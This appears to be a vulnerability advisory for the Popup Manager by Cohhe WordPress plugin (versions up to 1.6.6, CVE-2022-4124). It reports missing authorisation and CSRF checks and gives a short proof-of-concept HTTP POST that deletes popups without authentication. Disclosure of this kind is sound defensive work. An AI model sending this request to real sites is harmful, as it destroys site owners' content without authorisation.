Popup Manager by Cohhe

Popup Manager by Cohhe <= 1.6.6 - Unauthenticated Arbitrary Popup Deletion

LANACOMMONVDB ID: 8b1c01fd-1370-49d9-b5b2-60f71745b699

The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check when deleting popups, which could allow unauthenticated users to delete them.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=pm_delete_popup&popup_id=2

References

Source Code: https://wordpress.org/plugins/popup-manager/

CVE: CVE-2022-4124

Attributes

Catgory: WordPress Plugin

Discovered: 2022-11-07

Published: 2022-11-28

Affected Version: <= 1.6.6

Classification

Type: Broken Access Control, Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]